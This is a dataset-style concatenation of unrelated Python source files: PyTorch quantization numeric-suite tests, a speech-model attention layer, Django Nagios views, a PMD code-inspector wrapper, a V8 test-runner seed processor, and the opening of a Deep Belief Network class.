base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops)
# calibrate
m1_ns(data)
m2_ns(data)
# check activation result correctness
act_compare_dict = extract_logger_info(m1_ns, m2_ns, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 3)
self.assert_ns_compare_dict_valid(act_compare_dict)
# test shadowed activations
node_type_to_io_type_map = get_node_type_to_io_type_map()
node_type_to_io_type_map['funs_io_type_fp32'].add(_wrapped_hardswish)
node_type_to_io_type_map['funs_io_type_fp32'].add(_wrapped_sigmoid)
m2_shadows_m1_ns = _add_shadow_loggers_impl(
'a', m2, 'b', m1, OutputLogger,
should_log_inputs=False,
base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops,
node_type_to_io_type_map=node_type_to_io_type_map)
# calibrate
m2_shadows_m1_ns(data)
# check activation result correctness
act_compare_dict = extract_shadow_logger_info(
m2_shadows_m1_ns, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 2)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, enable after"
"dtype inference is supported")
def test_layer_names(self):
m = nn.Sequential(
nn.Conv2d(1, 1, 1),
nn.Conv2d(1, 1, 1),
nn.Sigmoid(),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
# extract weights
results = extract_weights('fp32', mp, 'int8', mq)
mq_node_names = [node.name for node in mq.graph.nodes]
for layer_name in results.keys():
self.assertTrue(layer_name in mq_node_names)
# match activations
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_ns, mq_ns = add_loggers(
'fp32', copy.deepcopy(mp), 'int8', mq, OutputLogger)
data = torch.randn(1, 1, 1, 1)
mp_ns(data)
mq_ns(data)
results = extract_logger_info(mp_ns, mq_ns, OutputLogger, 'int8')
mq_node_names = [node.name for node in mq_ns.graph.nodes]
for layer_name in results.keys():
self.assertTrue(layer_name in mq_node_names)
# match shadow activations
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers(
'fp32', mp, 'int8', mq, OutputLogger)
mp_shadows_mq(data)
results = extract_shadow_logger_info(
mp_shadows_mq, OutputLogger, 'int8')
mq_node_names = [node.name for node in mp_shadows_mq.graph.nodes]
for layer_name in results.keys():
self.assertTrue(layer_name in mq_node_names)
@skipIfNoFBGEMM
def test_extend_logger_results_with_comparison(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1)).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
# extract weights
results = extract_weights('fp32', mp, 'int8', mq)
extend_logger_results_with_comparison(
results, 'fp32', 'int8', compute_sqnr, 'sqnr_int8_vs_fp32')
extend_logger_results_with_comparison(
results, 'fp32', 'int8', compute_normalized_l2_error, 'l2_error_int8_vs_fp32')
extend_logger_results_with_comparison(
results, 'fp32', 'int8', compute_cosine_similarity,
'cosine_similarity_int8_vs_fp32')
for layer_name, layer_results in results.items():
assert 'sqnr_int8_vs_fp32' in \
layer_results['weight']['int8'][0].keys()
assert 'l2_error_int8_vs_fp32' in \
layer_results['weight']['int8'][0].keys()
assert 'cosine_similarity_int8_vs_fp32' in \
layer_results['weight']['int8'][0].keys()
@skipIfNoFBGEMM
def test_int8_shadows_fp32_simple(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1), nn.ReLU()).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mq_ref = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers(
'int8', mq, 'fp32', mp, OutputLogger)
# verify that scale and zp were extracted correctly
# for the first op, the scale+zp live as attributes on the module
scale_0 = mp_shadows_mq._0_input_scale_0
scale_0_ref = getattr(mq_ref, '0_input_scale_0')
self.assertEqual(scale_0, scale_0_ref)
zp_0 = mp_shadows_mq._0_input_zero_point_0
zp_0_ref = getattr(mq_ref, '0_input_zero_point_0')
self.assertEqual(zp_0, zp_0_ref)
# for the second op, the scale and zp of input to second op
# must equal to scale and zp of output of first op
scale_1 = mp_shadows_mq._1_input_scale_0
scale_1_ref = getattr(mq_ref, '0').scale
self.assertEqual(scale_1, scale_1_ref)
zp_1 = mp_shadows_mq._1_input_zero_point_0
zp_1_ref = getattr(mq_ref, '0').zero_point
self.assertEqual(zp_1, zp_1_ref)
# verify running data works
mp_shadows_mq(torch.randn(1, 1, 1, 1))
act_compare_dict = extract_shadow_logger_info(
mp_shadows_mq, OutputLogger, 'fp32')
self.assertTrue(len(act_compare_dict) == 2)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
def test_int8_shadows_fp32_coverage(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.adaptive_avg_pool = nn.AdaptiveAvgPool2d(1)
self.conv = nn.Conv2d(1, 1, 1)
def forward(self, x):
x = self.adaptive_avg_pool(x)
# input qparams of conv will be input qparams of adaptive_avg_pool
x = self.conv(x)
x = torch.mul(x, x)
x = self.conv(x)
x = torch.add(x, x)
x = F.relu(x)
x = self.conv(x)
return x
m = M().eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mq_ref = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers(
'int8', mq, 'fp32', mp, OutputLogger)
mp_shadows_mq(torch.randn(1, 1, 1, 1))
act_compare_dict = extract_shadow_logger_info(
mp_shadows_mq, OutputLogger, 'fp32')
self.assertTrue(len(act_compare_dict) == 4)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
def test_loggers_preserve_qat_numerics(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1))
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
mp = prepare_qat_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mc = convert_fx(copy.deepcopy(mp))
mp.apply(torch.ao.quantization.disable_observer)
datum = torch.randn(1, 1, 1, 1)
ref_fp32 = mp(datum)
ref_int8 = mc(datum)
mp_ns, mc_ns = add_loggers('fp32', mp, 'int8', mc, OutputLogger)
ref_fp32_ns = mp_ns(datum)
ref_int8_ns = mc_ns(datum)
self.assertEqual(ref_fp32, ref_fp32_ns)
self.assertEqual(ref_int8, ref_int8_ns)
@skipIfNoFBGEMM
def test_shadow_loggers_preserve_qat_numerics(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1))
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
mp = prepare_qat_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mc = convert_fx(copy.deepcopy(mp))
mp.apply(torch.ao.quantization.disable_observer)
datum = torch.randn(1, 1, 1, 1)
ref_fp32 = mp(datum)
ref_int8 = mc(datum)
mc_shadows_mp = add_shadow_loggers('int8', mc, 'fp32', mp, OutputLogger)
ref_shadow = mc_shadows_mp(datum)
self.assertEqual(ref_fp32, ref_shadow)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_extract_weights_cuda(self):
# Note: this is not using quantization because quantized kernels do not
# work on cuda yet.
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
results = extract_weights('a', m1, 'b', m2)
extend_logger_results_with_comparison(
results, 'a', 'b', compute_sqnr, 'sqnr')
self.assert_ns_compare_dict_valid(results)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_add_loggers_cuda(self):
# Note: this is not using quantization because quantized kernels do not
# work on cuda yet.
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m1_ns, m2_ns = add_loggers('a', m1, 'b', m2, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
datum = datum.cuda()
m1_ns(datum)
m2_ns(datum)
act_compare_dict = extract_logger_info(m1_ns, m2_ns, OutputLogger, 'b')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_add_shadow_loggers_cuda(self):
# Note: this is not using quantization because quantized kernels do not
# work on cuda yet.
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m1_shadows_m2 = add_shadow_loggers('a', m1, 'b', m2, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
datum = datum.cuda()
m1_shadows_m2(datum)
act_compare_dict = extract_shadow_logger_info(m1_shadows_m2, OutputLogger, 'b')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
class TestFXNumericSuiteCoreAPIsModels(FXNumericSuiteQuantizationTestCase):
"""
Tests numeric suite core APIs on non-toy models.
"""
@skipIfNoFBGEMM
def test_compare_weights_conv(self):
test_cases = (
(ConvModel(),),
(ConvBnModel(),),
(ConvBnReLUModel(),),
)
for m, in test_cases:
m.eval()
self._test_extract_weights(m, results_len=1)
@skipIfNoFBGEMM
def test_compare_weights_linear(self):
test_cases = (
(SingleLayerLinearModel(), None),
(
SingleLayerLinearDynamicModel(),
{"object_type": [(nn.Linear, default_dynamic_qconfig)]},
),
)
for m, qconfig_dict in test_cases:
m.eval()
res = self._test_extract_weights(
m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_weights_lstm_dynamic(self):
qconfig_dict = {"object_type": [(nn.LSTM, default_dynamic_qconfig)]}
m = LSTMwithHiddenDynamicModel().eval()
res = self._test_extract_weights(
m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_activations_conv(self):
test_cases = (
(ConvModel(),),
(ConvBnModel(),),
(ConvBnReLUModel(),),
)
for m, in test_cases:
m.eval()
res = self._test_match_activations(
m, (torch.randn(1, 3, 4, 4),), results_len=1)
@skipIfNoFBGEMM
def test_compare_activations_linear(self):
test_cases = (
(SingleLayerLinearModel(), None),
(
SingleLayerLinearDynamicModel(),
{"object_type": [(nn.Linear, default_dynamic_qconfig)]},
),
)
for m, qconfig_dict in test_cases:
m.eval()
res = self._test_match_activations(
m, (torch.randn(5, 5),), results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_activations_lstm_dynamic(self):
qconfig_dict = {"object_type": [(nn.LSTM, default_dynamic_qconfig)]}
m = LSTMwithHiddenDynamicModel().eval()
lstm_input = torch.rand((1, 1, 2))
lstm_hidden = (torch.rand(1, 1, 2), torch.rand(1, 1, 2))
# TODO(future PR): enable scripting (quant prepared LSTM not scriptable)
res = self._test_match_activations(
m, (lstm_input, lstm_hidden), results_len=1, qconfig_dict=qconfig_dict,
skip_scripting=True)
@skipIfNoFBGEMM
def test_compare_shadow_activations_conv(self):
test_cases = (
(ConvModel(),),
(ConvBnModel(),),
(ConvBnReLUModel(),),
)
for m, in test_cases:
m.eval()
res = self._test_match_shadow_activations(
m, (torch.randn(1, 3, 4, 4),), results_len=1)
@skipIfNoFBGEMM
def test_compare_shadow_activations_linear(self):
test_cases = (
(SingleLayerLinearModel(), None),
(
SingleLayerLinearDynamicModel(),
{"object_type": [(nn.Linear, default_dynamic_qconfig)]},
),
)
for m, qconfig_dict in test_cases:
m.eval()
res = self._test_match_shadow_activations(
m, (torch.randn(5, 5),), results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_shadow_activations_lstm_dynamic(self):
qconfig_dict = {"object_type": [(nn.LSTM, default_dynamic_qconfig)]}
m = LSTMwithHiddenDynamicModel().eval()
lstm_input = torch.rand((1, 1, 2))
lstm_hidden = (torch.rand(1, 1, 2), torch.rand(1, 1, 2))
# TODO(future PR): enable scripting (quant prepared LSTM not scriptable)
res = self._test_match_shadow_activations(
m, (lstm_input, lstm_hidden), results_len=1, qconfig_dict=qconfig_dict,
skip_scripting=True)
@skipIfNoFBGEMM
def test_sparsenn_compare_activations(self):
for should_log_inputs in (True, False):
sparse_nn = SparseNNModel().eval()
idx = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
x = torch.randn(2, 4)
self._test_match_activations(
sparse_nn, (idx, offsets, x),
results_len=5,
should_log_inputs=should_log_inputs)
@skipIfNoFBGEMM
def test_sparsenn_shadow(self):
for should_log_inputs in (True, False):
sparse_nn = SparseNNModel().eval()
idx = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
x = torch.randn(2, 4)
self._test_match_shadow_activations(
sparse_nn, (idx, offsets, x),
results_len=4,
should_log_inputs=should_log_inputs)
@skip_if_no_torchvision
@skipIfNoFBGEMM
@unittest.skip("TODO: broken by https://github.com/pytorch/pytorch/pull/61687, will enable later")
def test_resnet18(self):
import torchvision
m = torchvision.models.quantization.resnet18(pretrained=False, quantize=False).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
self._test_match_shadow_activations(
m, (torch.randn(1, 3, 224, 224),),
qconfig_dict=qconfig_dict,
should_log_inputs=False)
@skip_if_no_torchvision
@skipIfNoFBGEMM
@unittest.skip("TODO: broken by https://github.com/pytorch/pytorch/pull/61687, will enable later")
def test_mobilenet_v2(self):
import torchvision
m = torchvision.models.quantization.mobilenet_v2(pretrained=False, quantize=False).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
self._test_match_shadow_activations(
m, (torch.randn(1, 3, 224, 224),),
qconfig_dict=qconfig_dict,
should_log_inputs=False)
| 39.231477 | 112 | 0.611902 |
6841bd4b8edadca1f760c87c33024034cc0bd096 | 7,022 | py | Python | neural_sp/models/modules/attention.py | ishine/neural_sp | 7995613541d994976b00d80dcc12e2835163acfb | [
"Apache-2.0"
] | 577 | 2018-09-17T14:39:34.000Z | 2022-03-29T10:48:09.000Z | neural_sp/models/modules/attention.py | ishine/neural_sp | 7995613541d994976b00d80dcc12e2835163acfb | [
"Apache-2.0"
] | 221 | 2019-04-21T01:44:09.000Z | 2022-02-10T02:08:47.000Z | neural_sp/models/modules/attention.py | ishine/neural_sp | 7995613541d994976b00d80dcc12e2835163acfb | [
"Apache-2.0"
] | 139 | 2019-01-09T02:18:00.000Z | 2022-03-29T07:40:08.000Z | # Copyright 2018 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Single-head attention layer."""
import numpy as np
import torch
import torch.nn as nn
class AttentionMechanism(nn.Module):
"""Single-head attention layer.
Args:
kdim (int): dimension of key
qdim (int): dimension of query
atype (str): type of attention mechanisms
adim: (int) dimension of attention space
sharpening_factor (float): sharpening factor in the softmax layer
for attention weights
sigmoid_smoothing (bool): replace the softmax layer for attention weights
with the sigmoid function
conv_out_channels (int): number of channels of conv outputs.
This is used for location-based attention.
conv_kernel_size (int): size of kernel.
This must be the odd number.
dropout (float): dropout probability for attention weights
lookahead (int): lookahead frames for triggered attention
"""
def __init__(self, kdim, qdim, adim, atype,
sharpening_factor=1, sigmoid_smoothing=False,
conv_out_channels=10, conv_kernel_size=201, dropout=0.,
lookahead=2):
super().__init__()
assert conv_kernel_size % 2 == 1, "Kernel size should be odd for 'same' conv."
self.atype = atype
self.adim = adim
self.sharpening_factor = sharpening_factor
self.sigmoid_smoothing = sigmoid_smoothing
self.n_heads = 1
self.lookahead = lookahead
self.reset()
# attention dropout applied after the softmax layer
self.dropout = nn.Dropout(p=dropout)
if atype == 'no':
raise NotImplementedError
# NOTE: sequence-to-sequence without attention (use the last state as a context vector)
elif atype in ['add', 'triggered_attention']:
self.w_key = nn.Linear(kdim, adim)
self.w_query = nn.Linear(qdim, adim, bias=False)
self.v = nn.Linear(adim, 1, bias=False)
elif atype == 'location':
self.w_key = nn.Linear(kdim, adim)
self.w_query = nn.Linear(qdim, adim, bias=False)
self.w_conv = nn.Linear(conv_out_channels, adim, bias=False)
self.conv = nn.Conv2d(in_channels=1,
out_channels=conv_out_channels,
kernel_size=(1, conv_kernel_size),
stride=1,
padding=(0, (conv_kernel_size - 1) // 2),
bias=False)
self.v = nn.Linear(adim, 1, bias=False)
elif atype == 'dot':
self.w_key = nn.Linear(kdim, adim, bias=False)
self.w_query = nn.Linear(qdim, adim, bias=False)
elif atype == 'luong_dot':
assert kdim == qdim
# NOTE: no additional parameters
elif atype == 'luong_general':
self.w_key = nn.Linear(kdim, qdim, bias=False)
elif atype == 'luong_concat':
self.w = nn.Linear(kdim + qdim, adim, bias=False)
self.v = nn.Linear(adim, 1, bias=False)
else:
raise ValueError(atype)
def reset(self):
self.key = None
self.mask = None
def forward(self, key, value, query, mask=None, aw_prev=None,
cache=False, mode='', trigger_points=None, streaming=False):
"""Forward pass.
Args:
key (FloatTensor): `[B, klen, kdim]`
klens (IntTensor): `[B]`
value (FloatTensor): `[B, klen, vdim]`
query (FloatTensor): `[B, 1, qdim]`
mask (ByteTensor): `[B, qlen, klen]`
aw_prev (FloatTensor): `[B, 1 (H), 1 (qlen), klen]`
cache (bool): cache key and mask
mode: dummy interface for MoChA/MMA
trigger_points (IntTensor): `[B]`
streaming: dummy interface for streaming attention
Returns:
cv (FloatTensor): `[B, 1, vdim]`
aw (FloatTensor): `[B, 1 (H), 1 (qlen), klen]`
attn_state (dict): dummy interface
"""
bs, klen = key.size()[:2]
qlen = query.size(1)
attn_state = {}
if aw_prev is None:
aw_prev = key.new_zeros(bs, 1, klen)
else:
aw_prev = aw_prev.squeeze(1) # remove head dimension
# Pre-computation of encoder-side features for computing scores
if self.key is None or not cache:
if self.atype in ['add', 'triggered_attention',
'location', 'dot', 'luong_general']:
self.key = self.w_key(key)
else:
self.key = key
self.mask = mask
if mask is not None:
assert self.mask.size() == (bs, 1, klen), (self.mask.size(), (bs, 1, klen))
# for batch beam search decoding
if self.key.size(0) != query.size(0):
self.key = self.key[0: 1, :, :].repeat([query.size(0), 1, 1])
if self.atype == 'no':
raise NotImplementedError
elif self.atype in ['add', 'triggered_attention']:
tmp = self.key.unsqueeze(1) + self.w_query(query).unsqueeze(2)
e = self.v(torch.tanh(tmp)).squeeze(3)
elif self.atype == 'location':
conv_feat = self.conv(aw_prev.unsqueeze(1)).squeeze(2) # `[B, ch, klen]`
conv_feat = conv_feat.transpose(2, 1).contiguous().unsqueeze(1) # `[B, 1, klen, ch]`
tmp = self.key.unsqueeze(1) + self.w_query(query).unsqueeze(2)
e = self.v(torch.tanh(tmp + self.w_conv(conv_feat))).squeeze(3)
elif self.atype == 'dot':
e = torch.bmm(self.w_query(query), self.key.transpose(2, 1))
elif self.atype in ['luong_dot', 'luong_general']:
e = torch.bmm(query, self.key.transpose(2, 1))
elif self.atype == 'luong_concat':
query = query.repeat([1, klen, 1])
e = self.v(torch.tanh(self.w(torch.cat([self.key, query], dim=-1)))).transpose(2, 1)
assert e.size() == (bs, qlen, klen), (e.size(), (bs, qlen, klen))
NEG_INF = float(np.finfo(torch.tensor(0, dtype=e.dtype).numpy().dtype).min)
# Mask the right part from the trigger point
if self.atype == 'triggered_attention':
assert trigger_points is not None
for b in range(bs):
e[b, :, trigger_points[b] + self.lookahead + 1:] = NEG_INF
# Compute attention weights, context vector
if self.mask is not None:
e = e.masked_fill_(self.mask == 0, NEG_INF)
if self.sigmoid_smoothing:
aw = torch.sigmoid(e) / torch.sigmoid(e).sum(-1).unsqueeze(-1)
else:
aw = torch.softmax(e * self.sharpening_factor, dim=-1)
aw = self.dropout(aw)
cv = torch.bmm(aw, value)
return cv, aw.unsqueeze(1), attn_state
| 38.582418 | 99 | 0.561663 |
287962e1d5d953b9ab830ae11eddc68a43bc2963 | 903 | py | Python | nagios/views.py | Cola20150301/nagios | 9a60538705b6d25edea17423c880c61ab43cf8ab | [
"Apache-2.0"
] | null | null | null | nagios/views.py | Cola20150301/nagios | 9a60538705b6d25edea17423c880c61ab43cf8ab | [
"Apache-2.0"
] | null | null | null | nagios/views.py | Cola20150301/nagios | 9a60538705b6d25edea17423c880c61ab43cf8ab | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.shortcuts import render, HttpResponseRedirect, HttpResponse
import json
# Create your views here.
from common.mymako import render_mako_context
from views_main import Nagios
from fetch_nagios import FetchNagios
def home(request):
"""
首页
"""
data = FetchNagios().get_host()
return render(request, 'nagios/home.html', data)
def get_host(request):
res = Nagios().get_host_with_nagios()
return HttpResponse(res)
def add_host(request):
if request.method == 'POST':
request = request.POST.copy()
print request
res = Nagios().add_host_with_nagios(request)
return HttpResponse(json.dumps(res))
def del_host(request):
if request.method == 'POST':
print 1
request = request.POST.copy()
res = Nagios().del_host_with_nagios(request)
return HttpResponse(json.dumps(res))
| 23.763158 | 71 | 0.679956 |
aa2fe985da4db5dbeb0c5c4bb1b05b5c273297cf | 4,708 | py | Python | hyperstyle/src/python/review/inspectors/pmd/pmd.py | hyperskill/hyperstyle | bf3c6e2dc42290ad27f2d30ce42d84a53241544b | [
"Apache-2.0"
] | 18 | 2020-10-05T16:48:11.000Z | 2022-03-22T04:15:38.000Z | hyperstyle/src/python/review/inspectors/pmd/pmd.py | hyperskill/hyperstyle | bf3c6e2dc42290ad27f2d30ce42d84a53241544b | [
"Apache-2.0"
] | 60 | 2020-10-05T17:01:05.000Z | 2022-01-27T12:46:14.000Z | hyperstyle/src/python/review/inspectors/pmd/pmd.py | hyperskill/hyperstyle | bf3c6e2dc42290ad27f2d30ce42d84a53241544b | [
"Apache-2.0"
] | 6 | 2021-02-09T09:31:19.000Z | 2021-08-13T07:45:51.000Z | import csv
import logging
import os
from pathlib import Path
from typing import Any, Dict, List
from hyperstyle.src.python.review.application_config import LanguageVersion
from hyperstyle.src.python.review.common.file_system import check_set_up_env_variable, new_temp_dir
from hyperstyle.src.python.review.common.subprocess_runner import run_in_subprocess
from hyperstyle.src.python.review.inspectors.base_inspector import BaseInspector
from hyperstyle.src.python.review.inspectors.common import remove_prefix
from hyperstyle.src.python.review.inspectors.inspector_type import InspectorType
from hyperstyle.src.python.review.inspectors.issue import BaseIssue, CodeIssue, IssueDifficulty, IssueType
from hyperstyle.src.python.review.inspectors.pmd.issue_types import PMD_RULE_TO_ISSUE_TYPE
logger = logging.getLogger(__name__)
PMD_DIRECTORY_ENV = 'PMD_DIRECTORY'
check_set_up_env_variable(PMD_DIRECTORY_ENV)
PMD_VERSION_ENV = 'PMD_VERSION'
check_set_up_env_variable(PMD_VERSION_ENV)
PATH_TOOLS_PMD_SHELL_SCRIPT = f'{os.environ[PMD_DIRECTORY_ENV]}/pmd-bin-{os.environ[PMD_VERSION_ENV]}/bin/run.sh'
PATH_TOOLS_PMD_FILES = Path(__file__).parent / 'files'
PATH_TOOLS_PMD_RULES_SET = PATH_TOOLS_PMD_FILES / 'config.xml'
DEFAULT_JAVA_VERSION = LanguageVersion.JAVA_11
class PMDInspector(BaseInspector):
inspector_type = InspectorType.PMD
def __init__(self):
os.chmod(PATH_TOOLS_PMD_SHELL_SCRIPT, 0o777)
@classmethod
def _create_command(cls, path: Path,
output_path: Path,
language_version: LanguageVersion,
n_cpu: int) -> List[str]:
return [
PATH_TOOLS_PMD_SHELL_SCRIPT,
'pmd', '-d', str(path), '-no-cache',
'-R', PATH_TOOLS_PMD_RULES_SET,
'-language', 'java',
'-version', cls._get_java_version(language_version),
'-f', 'csv', '-r', str(output_path),
'-t', str(n_cpu),
]
def inspect(self, path: Path, config: Dict[str, Any]) -> List[BaseIssue]:
with new_temp_dir() as temp_dir:
output_path = Path(temp_dir / 'out.csv')
language_version = config.get('language_version')
if language_version is None:
logger.info(
f"The version of Java is not passed. The version to be used is: {DEFAULT_JAVA_VERSION.value}.",
)
language_version = DEFAULT_JAVA_VERSION
command = self._create_command(path, output_path, language_version, config['n_cpu'])
run_in_subprocess(command)
return self.parse_output(output_path)
def parse_output(self, output_path: Path) -> List[BaseIssue]:
"""
Parses the PMD output, which is a csv file, and returns a list of the issues found there.
If the passed path is not a file, an empty list is returned.
"""
if not output_path.is_file():
logger.error('%s: error - no output file' % self.inspector_type.value)
return []
with open(str(output_path)) as out_file:
reader = csv.DictReader(out_file)
return [
CodeIssue(
file_path=Path(row['File']),
line_no=int(row['Line']),
column_no=1,
type=self.choose_issue_type(row['Rule']),
origin_class=row['Rule'],
description=row['Description'],
inspector_type=self.inspector_type,
difficulty=IssueDifficulty.get_by_issue_type(self.choose_issue_type(row['Rule'])),
) for row in reader]
@classmethod
def choose_issue_type(cls, rule: str) -> IssueType:
"""
Defines IssueType by PMD rule name using config.
"""
issue_type = PMD_RULE_TO_ISSUE_TYPE.get(rule)
if not issue_type:
logger.warning('%s: %s - unknown rule' %
(cls.inspector_type.value, rule))
return IssueType.BEST_PRACTICES
return issue_type
@staticmethod
def _get_java_version(language_version: LanguageVersion) -> str:
"""
Converts language_version to the version of Java that PMD can work with.
For example, java11 will be converted to 11.
"""
java_version = language_version.value
if not language_version.is_java():
logger.warning(
f"The version passed is not the Java version. The version to be used is: {DEFAULT_JAVA_VERSION.value}.",
)
java_version = DEFAULT_JAVA_VERSION.value
return remove_prefix(java_version, "java")
| 39.898305 | 120 | 0.650595 |
160eac812b9fdd421a7c5104bbcb57320d8dfa62 | 2,009 | py | Python | 3rdParty/V8/v7.9.317/tools/testrunner/testproc/seed.py | rajeev02101987/arangodb | 817e6c04cb82777d266f3b444494140676da98e2 | [
"Apache-2.0"
] | 20,995 | 2015-01-01T05:12:40.000Z | 2022-03-31T21:39:18.000Z | tools/testrunner/testproc/seed.py | Andrea-MariaDB-2/v8 | a0f0ebd7a876e8cb2210115adbfcffe900e99540 | [
"BSD-3-Clause"
] | 9,469 | 2015-01-30T05:33:07.000Z | 2022-03-31T16:17:21.000Z | tools/testrunner/testproc/seed.py | Andrea-MariaDB-2/v8 | a0f0ebd7a876e8cb2210115adbfcffe900e99540 | [
"BSD-3-Clause"
] | 4,523 | 2015-01-01T15:12:34.000Z | 2022-03-28T06:23:41.000Z | # Copyright 2018 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import random
from collections import defaultdict
from . import base
from ..utils import random_utils
class SeedProc(base.TestProcProducer):
def __init__(self, count, seed=None, parallel_subtests=1):
"""
Args:
count: How many subtests with different seeds to create for each test.
0 means infinite.
seed: seed to use. None means random seed for each subtest.
parallel_subtests: How many subtest of each test to run at the same time.
"""
super(SeedProc, self).__init__('Seed')
self._count = count
self._seed = seed
self._last_idx = defaultdict(int)
self._todo = defaultdict(int)
self._parallel_subtests = parallel_subtests
if count:
self._parallel_subtests = min(self._parallel_subtests, count)
def setup(self, requirement=base.DROP_RESULT):
super(SeedProc, self).setup(requirement)
# SeedProc is optimized for dropping the result
assert requirement == base.DROP_RESULT
def _next_test(self, test):
is_loaded = False
for _ in range(0, self._parallel_subtests):
is_loaded |= self._try_send_next_test(test)
return is_loaded
def _result_for(self, test, subtest, result):
self._todo[test.procid] -= 1
if not self._try_send_next_test(test):
if not self._todo.get(test.procid):
del self._last_idx[test.procid]
del self._todo[test.procid]
self._send_result(test, None)
def _try_send_next_test(self, test):
def create_subtest(idx):
seed = self._seed or random_utils.random_seed()
return self._create_subtest(test, idx, random_seed=seed)
num = self._last_idx[test.procid]
if not self._count or num < self._count:
num += 1
self._todo[test.procid] += 1
self._last_idx[test.procid] = num
return self._send_test(create_subtest(num))
return False
| 31.390625 | 79 | 0.702837 |
32b2d9c80ff1b649d0068bcb9fa2e54813dc500c | 9,827 | py | Python | yadlt/models/rbm_models/dbn.py | Perfect-SoftwareEngineer/Deep-Learning-Tensorflow | b191cd2c8ff9d8cb6e2c6dedcac4483fa7548366 | [
"MIT"
] | null | null | null | yadlt/models/rbm_models/dbn.py | Perfect-SoftwareEngineer/Deep-Learning-Tensorflow | b191cd2c8ff9d8cb6e2c6dedcac4483fa7548366 | [
"MIT"
] | null | null | null | yadlt/models/rbm_models/dbn.py | Perfect-SoftwareEngineer/Deep-Learning-Tensorflow | b191cd2c8ff9d8cb6e2c6dedcac4483fa7548366 | [
"MIT"
] | null | null | null | """Implementation of Deep Belief Network Model using TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from yadlt.core import SupervisedModel
from yadlt.core import Trainer
from yadlt.models.rbm_models import rbm
from yadlt.utils import utilities
class DeepBeliefNetwork(SupervisedModel):
"""Implementation of Deep Belief Network for Supervised Learning.
The interface of the class is sklearn-like.
"""
def __init__(
self, rbm_layers, name='dbn', do_pretrain=False,
rbm_num_epochs=[10], rbm_gibbs_k=[1],
rbm_gauss_visible=False, rbm_stddev=0.1, rbm_batch_size=[10],
rbm_learning_rate=[0.01], finetune_dropout=1,
finetune_loss_func='softmax_cross_entropy',
finetune_act_func=tf.nn.sigmoid, finetune_opt='gradient_descent',
finetune_learning_rate=0.001, finetune_num_epochs=10,
